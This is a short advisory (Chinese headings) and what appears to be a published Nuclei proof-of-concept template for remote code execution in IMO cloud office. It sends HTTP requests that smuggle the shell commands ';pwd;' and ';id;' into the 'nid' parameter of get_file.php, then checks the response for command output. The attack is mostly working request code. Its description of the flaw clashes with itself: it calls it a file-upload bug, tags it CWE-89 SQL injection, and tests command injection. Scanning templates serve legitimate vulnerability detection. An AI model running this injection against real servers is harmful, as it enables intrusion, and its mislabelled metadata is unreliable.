漏洞描述
The lax filtering of imo cloud office/file/NDisk/get_file.php allows unlimited file uploads. Attackers can directly obtain website permissions through this vulnerability.
imo-rce: IMO - Remote Code Execution
PoC代码[已公开]
id: imo-rce
info:
name: IMO - Remote Code Execution
author: ritikchaddha
severity: critical
description: |
The lax filtering of imo cloud office/file/NDisk/get_file.php allows unlimited file uploads. Attackers can directly obtain website permissions through this vulnerability.
reference:
- https://www.henry4e36.top/index.php/archives/130.html#cl-1
- https://forum.butian.net/article/213
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-89
metadata:
max-request: 3
tags: imo,rce,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 2
matchers:
- type: word
part: body
words:
- 'imo'
case-insensitive: true
internal: true
- raw:
- |
GET /file/NDisk/get_file.php?cid=1&nid=;pwd; HTTP/1.1
Host: {{Hostname}}
- |
GET /file/NDisk/get_file.php?cid=1&nid=;id; HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
part: body_1
regex:
- 'home/www/html/[^"]*/file/NDisk'
- type: regex
part: body_2
regex:
- "uid=[0-9]+.*gid=[0-9]+.*"
# digest: 4b0a00483046022100ce53b80dd85ccb46a5c681537340751368afc559376ea4bcadd0304fdbaf7f02022100d229fd0cf9afbd067ef9b6a900dc6538a11c53ea667c06ef82861c8f9cc3e1eb:922c64590222798bb761d5b6d8e72950